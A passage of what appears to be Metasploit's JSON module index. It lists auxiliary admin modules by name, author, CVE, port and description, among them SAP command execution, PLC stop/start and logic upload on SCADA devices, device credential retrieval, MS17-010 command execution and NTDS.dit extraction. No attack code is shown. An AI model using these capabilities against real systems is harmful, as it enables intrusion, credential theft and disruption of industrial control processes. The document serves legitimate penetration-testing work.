"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will allow for simple SQL statements to be executed against a\n PostgreSQL instance given the appropriate credentials.",
"references": [
"URL-www.postgresql.org"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/postgres/postgres_sql.rb",
"is_install_path": true,
"ref_name": "admin/postgres/postgres_sql",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/sap/sap_configservlet_exec_noauth": {
"name": "SAP ConfigServlet OS Command Execution",
"full_name": "auxiliary/admin/sap/sap_configservlet_exec_noauth",
"rank": 300,
"disclosure_date": "2012-11-01",
"type": "auxiliary",
"author": [
"Dmitry Chastuhin",
"Andras Kabai"
],
"description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.",
"references": [
"OSVDB-92704",
"EDB-24963",
"URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/sap/sap_configservlet_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/sap/sap_mgmt_con_osexec": {
"name": "SAP Management Console OSExecute",
"full_name": "auxiliary/admin/sap/sap_mgmt_con_osexec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module allows execution of operating system commands through the SAP\n Management Console SOAP Interface. A valid username and password must be\n provided.",
"references": [
"URL-http://blog.c22.cc"
],
"platform": "",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb",
"is_install_path": true,
"ref_name": "admin/sap/sap_mgmt_con_osexec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/advantech_webaccess_dbvisitor_sqli": {
"name": "Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection",
"full_name": "auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli",
"rank": 300,
"disclosure_date": "2014-04-08",
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. This module can be used to extract the site\n and project usernames and hashes.",
"references": [
"CVE-2014-0763",
"ZDI-14-077",
"OSVDB-105572",
"BID-66740",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb",
"is_install_path": true,
"ref_name": "admin/scada/advantech_webaccess_dbvisitor_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/ge_proficy_substitute_traversal": {
"name": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal",
"full_name": "auxiliary/admin/scada/ge_proficy_substitute_traversal",
"rank": 300,
"disclosure_date": "2013-01-22",
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.",
"references": [
"CVE-2013-0653",
"OSVDB-89490",
"BID-57505",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb",
"is_install_path": true,
"ref_name": "admin/scada/ge_proficy_substitute_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/modicon_command": {
"name": "Schneider Modicon Remote START/STOP Command",
"full_name": "auxiliary/admin/scada/modicon_command",
"rank": 300,
"disclosure_date": "2012-04-05",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/modicon_password_recovery": {
"name": "Schneider Modicon Quantum Password Recovery",
"full_name": "auxiliary/admin/scada/modicon_password_recovery",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_password_recovery",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/scada/modicon_stux_transfer": {
"name": "Schneider Modicon Ladder Logic Upload/Download",
"full_name": "auxiliary/admin/scada/modicon_stux_transfer",
"rank": 300,
"disclosure_date": "2012-04-05",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb",
"is_install_path": true,
"ref_name": "admin/scada/modicon_stux_transfer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/moxa_credentials_recovery": {
"name": "Moxa Device Credential Retrieval",
"full_name": "auxiliary/admin/scada/moxa_credentials_recovery",
"rank": 300,
"disclosure_date": "2015-07-28",
"type": "auxiliary",
"author": [
"Patrick DeSantis <p@t-r10t.com>",
"K. Reid Wightman <reid@revics-security.com>"
],
"description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.",
"references": [
"CVE-2016-9361",
"BID-85965",
"URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/",
"URL-https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02"
],
"platform": "",
"arch": "",
"rport": 4800,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-10-10 17:56:17 +0000",
"path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb",
"is_install_path": true,
"ref_name": "admin/scada/moxa_credentials_recovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/multi_cip_command": {
"name": "Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands",
"full_name": "auxiliary/admin/scada/multi_cip_command",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"Ruben Santamarta <ruben@reversemode.com>",
"K. Reid Wightman <wightman@digitalbond.com>",
"todb <todb@metasploit.com>"
],
"description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.",
"references": [
"URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/"
],
"platform": "",
"arch": "",
"rport": 44818,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/scada/multi_cip_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/multi_cip_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/pcom_command": {
"name": "Unitronics PCOM remote START/STOP/RESET command",
"full_name": "auxiliary/admin/scada/pcom_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luis Rosa <lmrosa@dei.uc.pt>"
],
"description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.",
"references": [
"URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf"
],
"platform": "",
"arch": "",
"rport": 20256,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-02-11 13:46:00 +0000",
"path": "/modules/auxiliary/admin/scada/pcom_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/pcom_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/phoenix_command": {
"name": "PhoenixContact PLC Remote START/STOP Command",
"full_name": "auxiliary/admin/scada/phoenix_command",
"rank": 300,
"disclosure_date": "2015-05-20",
"type": "auxiliary",
"author": [
"Tijl Deneut <tijl.deneut@howest.be>"
],
"description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. They communicate using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n This allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962,\n and also to read out the CPU State (Running or Stopped) and start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series).",
"references": [
"URL-https://github.com/tijldeneut/ICSSecurityScripts",
"CVE-2014-9195"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/scada/phoenix_command.rb",
"is_install_path": true,
"ref_name": "admin/scada/phoenix_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/scada/yokogawa_bkbcopyd_client": {
"name": "Yokogawa BKBCopyD.exe Client",
"full_name": "auxiliary/admin/scada/yokogawa_bkbcopyd_client",
"rank": 300,
"disclosure_date": "2014-08-09",
"type": "auxiliary",
"author": [
"Unknown"
],
"description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.",
"references": [
"CVE-2014-5208",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
],
"platform": "",
"arch": "",
"rport": 20111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-11 10:02:36 +0000",
"path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb",
"is_install_path": true,
"ref_name": "admin/scada/yokogawa_bkbcopyd_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/serverprotect/file": {
"name": "TrendMicro ServerProtect File Access",
"full_name": "auxiliary/admin/serverprotect/file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"toto"
],
"description": "This module exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.",
"references": [
"CVE-2007-6507",
"OSVDB-44318",
"ZDI-07-077"
],
"platform": "",
"arch": "",
"rport": 5168,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/serverprotect/file.rb",
"is_install_path": true,
"ref_name": "admin/serverprotect/file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/check_dir_file": {
"name": "SMB Scanner Check File/Directory Utility",
"full_name": "auxiliary/admin/smb/check_dir_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"j0hn__f"
],
"description": "This module is useful when checking an entire network\n of SMB hosts for the presence of a known file or directory.\n An example would be to scan all systems for the presence of\n antivirus software or a known malware outbreak. Typically you must set\n RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/check_dir_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/delete_file": {
"name": "SMB File Delete Utility",
"full_name": "auxiliary/admin/smb/delete_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module deletes a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/smb/delete_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/delete_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/download_file": {
"name": "SMB File Download Utility",
"full_name": "auxiliary/admin/smb/download_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module downloads a file from a target share and path. The usual reason\n to use this module is to work around limitations in an existing SMB client that may not\n be able to take advantage of pass-the-hash style authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-05-07 00:13:11 +0000",
"path": "/modules/auxiliary/admin/smb/download_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/download_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/list_directory": {
"name": "SMB Directory Listing Utility",
"full_name": "auxiliary/admin/smb/list_directory",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>",
"hdm <x@hdm.io>"
],
"description": "This module lists the directory of a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/smb/list_directory.rb",
"is_install_path": true,
"ref_name": "admin/smb/list_directory",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/ms17_010_command": {
"name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution",
"full_name": "auxiliary/admin/smb/ms17_010_command",
"rank": 300,
"disclosure_date": "2017-03-14",
"type": "auxiliary",
"author": [
"sleepya",
"zerosum0x0",
"Shadow Brokers",
"Equation Group"
],
"description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with that of an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0146",
"CVE-2017-0147",
"URL-https://github.com/worawit/MS17-010",
"URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf",
"URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/ms17_010_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALSYNERGY",
"ETERNALROMANCE",
"ETERNALCHAMPION",
"ETERNALBLUE"
]
}
},
"auxiliary_admin/smb/psexec_command": {
"name": "Microsoft Windows Authenticated Administration Utility",
"full_name": "auxiliary/admin/smb/psexec_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis @R3dy__ <rdavis@accuvant.com>"
],
"description": "This module uses a valid administrator username and password to execute an\n arbitrary command on one or more hosts, using a technique similar to the \"psexec\"\n utility provided by SysInternals. Daisy chaining commands with '&' does not work\n and users shouldn't try it. This module is useful because it doesn't need to upload\n any binaries to the target machine.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
"URL-http://sourceforge.net/projects/smbexec/",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/admin/smb/psexec_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/psexec_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/psexec_ntdsgrab": {
"name": "PsExec NTDS.dit And SYSTEM Hive Download Utility",
"full_name": "auxiliary/admin/smb/psexec_ntdsgrab",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Royce Davis <rdavis@accuvant.com>"
],
"description": "This module authenticates to an Active Directory Domain Controller and creates\n a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n hive copy can be used in combination with other tools for offline extraction of AD\n password hashes. All of this is done without uploading a single binary to the\n target host.",
"references": [
"URL-http://sourceforge.net/projects/smbexec",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-08-01 22:39:14 +0000",
"path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
"is_install_path": true,
"ref_name": "admin/smb/psexec_ntdsgrab",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/samba_symlink_traversal": {
"name": "Samba Symlink Directory Traversal",
"full_name": "auxiliary/admin/smb/samba_symlink_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kcope",
"hdm <x@hdm.io>"
],
"description": "This module exploits a directory traversal flaw in the Samba\n CIFS server. To exploit this flaw, a writeable share must be specified.\n The newly created directory will link to the root filesystem.",
"references": [
"CVE-2010-0926",
"OSVDB-62145",
"URL-http://www.samba.org/samba/news/symlink_attack.html"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb",
"is_install_path": true,
"ref_name": "admin/smb/samba_symlink_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/upload_file": {
"name": "SMB File Upload Utility",
"full_name": "auxiliary/admin/smb/upload_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uploads a file to a target share and path. The only reason\n to use this module is if your existing SMB client is not able to support the features\n of the Metasploit Framework that you need, like pass-the-hash authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-05-07 00:13:11 +0000",
"path": "/modules/auxiliary/admin/smb/upload_file.rb",
"is_install_path": true,
"ref_name": "admin/smb/upload_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/smb/webexec_command": {
"name": "WebEx Remote Command Execution Utility",
"full_name": "auxiliary/admin/smb/webexec_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ron Bowes <ron@skullsecurity.net>"
],
"description": "This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.",
"references": [
"URL-https://webexec.org",
"CVE-2018-15442"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-10-24 16:18:17 +0000",
"path": "/modules/auxiliary/admin/smb/webexec_command.rb",
"is_install_path": true,
"ref_name": "admin/smb/webexec_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/sunrpc/solaris_kcms_readfile": {
"name": "Solaris KCMS + TTDB Arbitrary File Read",
"full_name": "auxiliary/admin/sunrpc/solaris_kcms_readfile",
"rank": 300,
"disclosure_date": "2003-01-22",
"type": "auxiliary",
"author": [
"vlad902 <vlad902@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module targets a directory traversal vulnerability in the\n kcms_server component from the Kodak Color Management System. By\n utilizing the ToolTalk Database Server's TT_ISBUILD procedure, an\n attacker can bypass existing directory traversal validation and\n read arbitrary files.\n\n Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both\n kcms_server and rpc.ttdbserverd must be running on the target\n host.",
"references": [
"CVE-2003-0027",
"OSVDB-8201",
"BID-6665",
"URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb",
"is_install_path": true,
"ref_name": "admin/sunrpc/solaris_kcms_readfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/teradata/teradata_odbc_sql": {
"name": "Teradata ODBC SQL Query Module",
"full_name": "auxiliary/admin/teradata/teradata_odbc_sql",
"rank": 300,
"disclosure_date": "2018-03-29",
"type": "auxiliary",
"author": [
"Ted Raffle (actuated)"
],
"description": "SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.",
"references": [
"URL-https://developer.teradata.com/tools/reference/teradata-python-module",
"URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux"
],
"platform": "",
"arch": "",
"rport": 1025,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-13 13:09:01 +0000",
"path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py",
"is_install_path": true,
"ref_name": "admin/teradata/teradata_odbc_sql",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"AKA": [
"Teradata ODBC Authentication Scanner"
]
}
},
"auxiliary_admin/tftp/tftp_transfer_util": {
"name": "TFTP File Transfer Utility",
"full_name": "auxiliary/admin/tftp/tftp_transfer_util",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will transfer a file to or from a remote TFTP server.\n Note that the target must be able to connect back to the Metasploit system,\n and NAT traversal for TFTP is often unsupported.\n\n Two actions are supported: \"Upload\" and \"Download,\" which behave as one might\n expect -- use 'set action Actionname' to use either mode of operation.\n\n If \"Download\" is selected, at least one of FILENAME or REMOTE_FILENAME\n must be set. If \"Upload\" is selected, either FILENAME must be set to a valid path to\n a source file, or FILEDATA must be populated. FILENAME may be a fully qualified path,\n or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.",
"references": [
"URL-http://www.faqs.org/rfcs/rfc1350.html",
"URL-http://www.networksorcery.com/enp/protocol/tftp.htm"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb",
"is_install_path": true,
"ref_name": "admin/tftp/tftp_transfer_util",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/tikiwiki/tikidblib": {
"name": "TikiWiki Information Disclosure",
"full_name": "auxiliary/admin/tikiwiki/tikidblib",
"rank": 300,
"disclosure_date": "2006-11-01",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "A vulnerability has been reported in Tikiwiki, which can be exploited by\n an anonymous user to dump the MySQL user & passwd just by creating a mysql\n error with the \"sort_mode\" var.\n\n The vulnerability was reported in Tikiwiki version 1.9.5.",
"references": [
"OSVDB-30172",
"BID-20858",
"CVE-2006-5702",
"URL-http://secunia.com/advisories/22678/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb",
"is_install_path": true,
"ref_name": "admin/tikiwiki/tikidblib",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/upnp/soap_portmapping": {
"name": "UPnP IGD SOAP Port Mapping Utility",
"full_name": "auxiliary/admin/upnp/soap_portmapping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"St0rn <fabien@anbu-pentest.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Manage port mappings on a UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests.",
"references": [
"URL-http://www.upnp-hacks.org/igd.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb",
"is_install_path": true,
"ref_name": "admin/upnp/soap_portmapping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vmware/poweroff_vm": {
"name": "VMWare Power Off Virtual Machine",
"full_name": "auxiliary/admin/vmware/poweroff_vm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
